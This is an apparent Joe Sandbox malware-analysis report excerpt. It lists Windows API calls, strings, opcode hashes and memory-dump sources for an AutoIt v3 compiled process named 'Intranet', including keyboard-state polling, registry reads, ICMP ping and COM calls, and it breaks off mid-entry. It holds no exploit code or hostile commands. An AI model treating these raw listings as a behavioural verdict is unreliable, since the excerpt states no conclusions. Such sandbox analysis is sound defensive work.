                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                            • API String ID: 537147316-3738523708
                                                                            • Opcode ID: 5fdfbc0c033a4627ec25622d092f38c9d91924b22894ffb6e314bc5660c67962
                                                                            • Instruction ID: 96a58f4e43de7b3d1d5dc2804d1d76c4545f0b95625e672106dc5a26422a4cb3
                                                                            • Opcode Fuzzy Hash: 5fdfbc0c033a4627ec25622d092f38c9d91924b22894ffb6e314bc5660c67962
                                                                            • Instruction Fuzzy Hash: 6302B2301083419FC724EF25C951AAFBBE5BF99308F00491FF495932A2DB78D949CB6A
                                                                            APIs
                                                                              • Part of subcall function 004C00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,004B3094), ref: 004C00ED
                                                                              • Part of subcall function 004C08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,004B309F), ref: 004C08E3
                                                                            • RegOpenKeyExW.ADVAPI32(?,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004B30E2
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004F01BA
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004F01FB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004F0239
                                                                            • _wcscat.LIBCMT ref: 004F0292
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                            • API String ID: 2673923337-2727554177
                                                                            • Opcode ID: f3e0da1d1878dce1b61c047b8752c83021544628ace60ce619b3dff223355986
                                                                            • Instruction ID: d38e0db975ca3274bbe9d3d20826309140a9d3100df2c6931b5db0aff730efe1
                                                                            • Opcode Fuzzy Hash: f3e0da1d1878dce1b61c047b8752c83021544628ace60ce619b3dff223355986
                                                                            • Instruction Fuzzy Hash: 2F71AF754053059EC304EF2AD8A59ABBBE8FF94344F80062FF445832B1DFB49948DB6A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __i64tow__itow__swprintf
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 421087845-2263619337
                                                                            • Opcode ID: 8fd81fbc027bda15400fc07bd3e84c799e2c02ce1188739313a434ae8d593740
                                                                            • Instruction ID: 9518ea18beb9d4ffff5c590b9ee2268273310af19e1bb7825b42e16838fd8de2
                                                                            • Opcode Fuzzy Hash: 8fd81fbc027bda15400fc07bd3e84c799e2c02ce1188739313a434ae8d593740
                                                                            • Instruction Fuzzy Hash: 9E411735A04209AFDB34DF34D851F7A77E8EB85304F20446FE149C7391EAB99942C719
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0052778F
                                                                            • CreateMenu.USER32 ref: 005277AA
                                                                            • SetMenu.USER32(?,00000000), ref: 005277B9
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00527846
                                                                            • IsMenu.USER32(?), ref: 0052785C
                                                                            • CreatePopupMenu.USER32 ref: 00527866
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00527893
                                                                            • DrawMenuBar.USER32 ref: 0052789B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                            • String ID: 0$F
                                                                            • API String ID: 176399719-3044882817
                                                                            • Opcode ID: 90e835fc741ef2a7819c2da3a3f3c5fea3367bb485b769eca26239281327dcc0
                                                                            • Instruction ID: ac56b1c96a79ce3e52aed51499137c214cd611442049983bce9d7bccdaf25de8
                                                                            • Opcode Fuzzy Hash: 90e835fc741ef2a7819c2da3a3f3c5fea3367bb485b769eca26239281327dcc0
                                                                            • Instruction Fuzzy Hash: DC415A79A00219EFDB10DF64E898A9ABBF5FF5A310F144429F945A73A0D730AD14DF50
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00527B83
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00527B8A
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00527B9D
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00527BA5
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00527BB0
                                                                            • DeleteDC.GDI32(00000000), ref: 00527BB9
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00527BC3
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00527BD7
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00527BE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            • API String ID: 2559357485-2160076837
                                                                            • Opcode ID: ece5f8d6345ceda6a3877aa8a27a1ead31c964ee51e76cb71d619f5a15f32908
                                                                            • Instruction ID: 448bdb823eb6ab6ebf5d863fe725f6e34bc78a7423c22c84068e60cf0392e9dc
                                                                            • Opcode Fuzzy Hash: ece5f8d6345ceda6a3877aa8a27a1ead31c964ee51e76cb71d619f5a15f32908
                                                                            • Instruction Fuzzy Hash: 1E316732104229ABDF119F64EC59FDB3F69FF1E720F101215FA15A22E0D7719824EBA4
                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004B5156
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004B5165
                                                                            • LoadIconW.USER32(00000063), ref: 004B517C
                                                                            • LoadIconW.USER32(000000A4), ref: 004B518E
                                                                            • LoadIconW.USER32(000000A2), ref: 004B51A0
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004B51C6
                                                                            • RegisterClassExW.USER32(?), ref: 004B521C
                                                                              • Part of subcall function 004A3411: GetSysColorBrush.USER32(0000000F), ref: 004A3444
                                                                              • Part of subcall function 004A3411: RegisterClassExW.USER32(00000030), ref: 004A346E
                                                                              • Part of subcall function 004A3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004A347F
                                                                              • Part of subcall function 004A3411: InitCommonControlsEx.COMCTL32(?), ref: 004A349C
                                                                              • Part of subcall function 004A3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004A34AC
                                                                              • Part of subcall function 004A3411: LoadIconW.USER32(000000A9), ref: 004A34C2
                                                                              • Part of subcall function 004A3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004A34D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: 3489eedeaefb6c03470e7b704c105c72bdbd9534dbe2e8d58a83dd7b2f85ede7
                                                                            • Instruction ID: 6cc9702cd167c38fad8958956f4e211e29033e1ecd53448b807d36ddabe96dd9
                                                                            • Opcode Fuzzy Hash: 3489eedeaefb6c03470e7b704c105c72bdbd9534dbe2e8d58a83dd7b2f85ede7
                                                                            • Instruction Fuzzy Hash: 84216B74D04308AFEB109FA8ED29B9D7BB4FB2C318F00015AF504A72A0D7F65558AF94
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 004C706B
                                                                              • Part of subcall function 004C8D58: __getptd_noexit.LIBCMT ref: 004C8D58
                                                                            • __gmtime64_s.LIBCMT ref: 004C7104
                                                                            • __gmtime64_s.LIBCMT ref: 004C713A
                                                                            • __gmtime64_s.LIBCMT ref: 004C7157
                                                                            • __allrem.LIBCMT ref: 004C71AD
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C71C9
                                                                            • __allrem.LIBCMT ref: 004C71E0
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C71FE
                                                                            • __allrem.LIBCMT ref: 004C7215
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C7233
                                                                            • __invoke_watson.LIBCMT ref: 004C72A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                            • String ID:
                                                                            • API String ID: 384356119-0
                                                                            • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                            • Instruction ID: 1bfdf69ccb58fcef949a61011eef556d865eef8def360e89d914df9958521a02
                                                                            • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                            • Instruction Fuzzy Hash: 92710676A04716ABD7549E7ACC81F5BB3A8AF41324F14422FF514E7381EB78D9408B98
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00502CE9
                                                                            • GetMenuItemInfoW.USER32(00567890,000000FF,00000000,00000030,?,000000FF,?,?), ref: 00502D4A
                                                                            • SetMenuItemInfoW.USER32(00567890,00000004,00000000,00000030), ref: 00502D80
                                                                            • Sleep.KERNEL32(000001F4), ref: 00502D92
                                                                            • GetMenuItemCount.USER32(?,?,000000FF,?,?), ref: 00502DD6
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00502DF2
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00502E1C
                                                                            • GetMenuItemID.USER32(?,?), ref: 00502E61
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00502EA7
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030,?,000000FF,?,?), ref: 00502EBB
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00502EDC
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                            • String ID:
                                                                            • API String ID: 4176008265-0
                                                                            • Opcode ID: d88d923f7122ecddb7278c8a005fc672ff22b6added4f06262ae68317b618db0
                                                                            • Instruction ID: 3b35df330eacfcc3596fc90698f774b4073cc85edd025302e3721c7b1b73825c
                                                                            • Opcode Fuzzy Hash: d88d923f7122ecddb7278c8a005fc672ff22b6added4f06262ae68317b618db0
                                                                            • Instruction Fuzzy Hash: F861687194024AAFDB21DF64CC8CABEBFADFB54308F144459E841A7291D731AD0AEB21
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 005275CA
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 005275CD
                                                                            • GetWindowLongW.USER32(?,000000F0,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 005275F1
                                                                            • _memset.LIBCMT ref: 00527602
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00527614
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007,?,00000000,005677C4), ref: 0052768C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 830647256-0
                                                                            • Opcode ID: 51c90a5fa373c22fb7d087cd1c7dd8bcfdbbbdb97acf7f8d6b718979abf682c0
                                                                            • Instruction ID: 85abd4abc0a29b5c1fafcbbe193c05b641b7ecd6b2ab96d461c33651f954d0b9
                                                                            • Opcode Fuzzy Hash: 51c90a5fa373c22fb7d087cd1c7dd8bcfdbbbdb97acf7f8d6b718979abf682c0
                                                                            • Instruction Fuzzy Hash: FA616975900218AFDB10DFA8DC85EAE7BB8FF4D714F14019AEA14A72A1C770AD45DB60
                                                                            APIs
                                                                            • #41.OLEAUT32(0000000C,?,?,?,?,?,?,?,?,004F756E,?,?,?,?,?,004F779C), ref: 004F77DD
                                                                            • #37.OLEAUT32(?,?,?,?,?,?,?,004F756E,?,?,?,?,?,004F779C,?,?), ref: 004F7836
                                                                            • #8.OLEAUT32(?,?,?,?,?,?,?,004F756E,?,?,?,?,?,004F779C,?,?), ref: 004F7848
                                                                            • #23.WSOCK32(?,?,?,?,?,?,?,?,004F756E), ref: 004F7868
                                                                            • #10.WSOCK32(?,?,00000002,?,?,?,?,?,?,?,004F756E), ref: 004F78BB
                                                                            • #24.OLEAUT32(?,00000002,?,?,?,?,?,?,?,004F756E), ref: 004F78CF
                                                                            • #9.WSOCK32(?,?,?,?,?,?,?,004F756E), ref: 004F78E4
                                                                            • #39.OLEAUT32(?,?,?,?,?,?,?,004F756E), ref: 004F78F1
                                                                            • #38.OLEAUT32(?,?,?,?,?,?,?,004F756E), ref: 004F78FA
                                                                            • #9.WSOCK32(?,?,?,?,?,?,?,004F756E), ref: 004F790C
                                                                            • #38.OLEAUT32(?,?,?,?,?,?,?,004F756E,?,?,?,?,?,004F779C,?,?), ref: 004F7917
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 166eb31c16a40e02325d86b94c743e5cd63a3c930de7f898f98dee15c1f89ad0
                                                                            • Instruction ID: c8d409955fc415bbfcb2ea0dd003da44a84877c111ff298175beac7ef5f7ae31
                                                                            • Opcode Fuzzy Hash: 166eb31c16a40e02325d86b94c743e5cd63a3c930de7f898f98dee15c1f89ad0
                                                                            • Instruction Fuzzy Hash: 27419331A0021D9FDF00DFA5C848DADBBB8FF58344F00806AEA55A7361C778AA49DF94
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00500530
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 005005B1
                                                                            • GetKeyState.USER32(000000A0), ref: 005005CC
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 005005E6
                                                                            • GetKeyState.USER32(000000A1), ref: 005005FB
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00500613
                                                                            • GetKeyState.USER32(00000011), ref: 00500625
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0050063D
                                                                            • GetKeyState.USER32(00000012), ref: 0050064F
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00500667
                                                                            • GetKeyState.USER32(0000005B), ref: 00500679
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: c81b4f26f9488acd4081aefd27a18080963634b3cc2775a7be06ba28ce97c77b
                                                                            • Instruction ID: 1c50bb99a4b9621638ec0a360d20aed2653a138a95762bd7ecdab912e99c7d39
                                                                            • Opcode Fuzzy Hash: c81b4f26f9488acd4081aefd27a18080963634b3cc2775a7be06ba28ce97c77b
                                                                            • Instruction Fuzzy Hash: 7241D7305047CA6DFF318B6488143BDBEA17B61304F08615AD5C65B6C2EBA599D8CFA2
                                                                            APIs
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • CoInitialize.OLE32 ref: 00518AED
                                                                            • CoUninitialize.OLE32 ref: 00518AF8
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00533BBC,?), ref: 00518B58
                                                                            • IIDFromString.OLE32(?,?), ref: 00518BCB
                                                                            • #8.OLEAUT32(?), ref: 00518C65
                                                                            • #9.WSOCK32(?,?), ref: 00518CC6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFromInitializeInstanceStringUninitialize__itow__swprintf
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 1994486276-1287834457
                                                                            • Opcode ID: eb59d325e90fe9634234b86c2a511e1d3a8e0dd55c3a35e074f3723a3ca49265
                                                                            • Instruction ID: 9801cc1ca09c4d41ff45c95474ee4e40afdeda44e0180e792f16034049f2d99f
                                                                            • Opcode Fuzzy Hash: eb59d325e90fe9634234b86c2a511e1d3a8e0dd55c3a35e074f3723a3ca49265
                                                                            • Instruction Fuzzy Hash: CA6170702087119FE720DF14C849BAABBE4BF85718F14484EF9859B291DB74ED88CB96
                                                                            APIs
                                                                            • #115.WSOCK32(00000101,?), ref: 00515E7E
                                                                            • #10.WSOCK32(?,?,?), ref: 00515EC3
                                                                            • #52.WSOCK32(?), ref: 00515ECF
                                                                            • IcmpCreateFile.IPHLPAPI ref: 00515EDD
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0,00000000), ref: 00515F4D
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0,00000000), ref: 00515F63
                                                                            • IcmpCloseHandle.IPHLPAPI(00000000,00000002,00000000), ref: 00515FD8
                                                                            • #116.WSOCK32 ref: 00515FDE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$#115#116CloseCreateFileHandle
                                                                            • String ID: Ping
                                                                            • API String ID: 1853569507-2246546115
                                                                            • Opcode ID: 430b1089a2cceb5476d6905440cc2557d31bebdb00fd47de60fb6d53484f2f9b
                                                                            • Instruction ID: 10b6c8cde451b2ce35b17115d49774195e6c356f0077e1a1cbc3818b89af49eb
                                                                            • Opcode Fuzzy Hash: 430b1089a2cceb5476d6905440cc2557d31bebdb00fd47de60fb6d53484f2f9b
                                                                            • Instruction Fuzzy Hash: 9051AF71604700DFE720EF25CC49B6ABBE4FF84314F04492AF9959B2A1EB74E845DB42
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 004B4E22
                                                                            • KillTimer.USER32(?,00000001), ref: 004B4E4C
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B4E6F
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004B4E7A
                                                                            • CreatePopupMenu.USER32 ref: 004B4E8E
                                                                            • PostQuitMessage.USER32(00000000), ref: 004B4EAF
                                                                            Strings
                                                                            Memory Dump Source
